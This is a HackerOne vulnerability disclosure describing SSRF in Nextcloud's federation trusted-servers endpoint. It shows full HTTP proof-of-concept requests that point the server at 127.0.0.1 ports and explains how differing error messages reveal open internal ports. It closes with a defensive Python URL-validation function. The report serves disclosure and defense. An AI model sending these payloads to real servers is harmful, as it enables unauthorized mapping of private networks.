Nextcloud: Server-side request forgery (SSRF) in the Nextcloud implementation.

2016-06-17T19:27:26
ID H1:145524
Type hackerone
Reporter paglababa
Modified 2016-06-17T19:41:05

Description

An admin of a Nextcloud server can add other trusted Nextcloud servers to his own installation. The following request is sent when a new server is added:

```http
POST /nextcloud/index.php/apps/federation/trusted-servers HTTP/1.1
Host: myown.nextcloudserver.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken: GAFcYDUGGyM0CCYeIlk4b19ADhwOFgcLOy4kERdDL1Q=:AL1VmGJMGqQsVhw59y9yE/wsjGJWMtc8DJljyuFMaI4=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 27
Cookie: oc6wp9sjado5=nnofa4hfq2esn7anu70hg3c2h0; oc_sessionPassphrase=dvniWxtCrcQk4Nbt4eXXmyZu5wUk3JoHziCUaCBcmeQFaM0333bS8HBwvFOAEwF2f0cnj9gewI7OSn1ELD3IiOysU3FOj%2FkA%2BV2kZ%2FUmc9UMQTzoZpp1VSLNUJXEKQkw; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true
Connection: close

url=http://nextcloud.remote.server.com/
```

This request makes the server issue a cURL request to the URL supplied in the POST variable. The response looks like this:

```http
HTTP/1.1 400 Bad request
Date: Fri, 17 Jun 2016 19:21:09 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: default-src 'none';script-src 'self' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self'
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: Sameorigin
X-Robots-Tag: none
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Content-Length: 117
Connection: close
Content-Type: application/json; charset=utf-8

{"message":"Client error response [url] http:\/\/google.com\/status.php [status code] 404 [reason phrase] Not Found"}
```

Attack Scenario

This feature can be used to launch an SSRF attack to map the internal network, for example to identify which internal ports are open. Consider the following request:

```http
POST /nextcloud/index.php/apps/federation/trusted-servers HTTP/1.1
Host: myown.nextcloudserver.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken: GAFcYDUGGyM0CCYeIlk4b19ADhwOFgcLOy4kERdDL1Q=:AL1VmGJMGqQsVhw59y9yE/wsjGJWMtc8DJljyuFMaI4=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 23
Cookie: oc6wp9sjado5=nnofa4hfq2esn7anu70hg3c2h0; oc_sessionPassphrase=dvniWxtCrcQk4Nbt4eXXmyZu5wUk3JoHziCUaCBcmeQFaM0333bS8HBwvFOAEwF2f0cnj9gewI7OSn1ELD3IiOysU3FOj%2FkA%2BV2kZ%2FUmc9UMQTzoZpp1VSLNUJXEKQkw; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true
Connection: close

url=http://127.0.0.1:80
```

Response

```json
{"message":"Client error response [url] http:\/\/127.0.0.1\/status.php [status code] 404 [reason phrase] Not Found"}
```

This indicates that port 80 on localhost is open. To check port 8080 we used http://127.0.0.1:8080 as the POST value and received the following response:

```json
{"message":"cURL error 7: Failed to connect to 127.0.0.1 port 8080: Connection refused"}
```

We received this error because port 8080 on localhost was not open. The two distinct error messages therefore act as an oracle for which internal ports accept connections.
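As an added example (not Nextcloud's code), a defender-side check in Python for the pattern the report describes: a trusted-server URL is rejected before any request is made if its host is, or resolves to, a loopback, private or otherwise non-public address. The `resolver` parameter and the hostnames used in testing are assumptions introduced here so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def _resolve(host):
    """Default resolver: every address the system DNS returns for host."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_url(url, resolver=_resolve):
    """Return True only if url is http(s) and every address its host
    resolves to is globally routable. Loopback (127.0.0.1, ::1), RFC 1918,
    link-local and the other special-purpose ranges all fail the check, so
    the trusted-server feature cannot be pointed at the internal network.
    The resolver parameter is an assumption added so the check can be run
    against constructed DNS answers instead of live lookups."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname  # already lowercased; IPv6 brackets stripped
    try:
        ipaddress.ip_address(host)  # raises ValueError for a hostname
        addrs = {host}              # literal IP: no DNS involved
    except ValueError:
        try:
            addrs = set(resolver(host))
        except OSError:             # socket.gaierror is a subclass of OSError
            return False
    if not addrs:
        return False
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        # Reject if ANY record is non-public: a name that mixes a public
        # and an internal record must not slip through.
        if not ip.is_global or ip.is_multicast or ip.is_unspecified:
            return False
    # Caveat: to defeat DNS rebinding between this check and the actual
    # fetch, the caller should connect to one of the vetted addresses
    # rather than re-resolving the hostname at request time.
    return True
```

Returning one fixed error message regardless of whether the remote fetch ended in a 404 or a connection refusal would additionally remove the open/closed-port oracle visible in the two responses above.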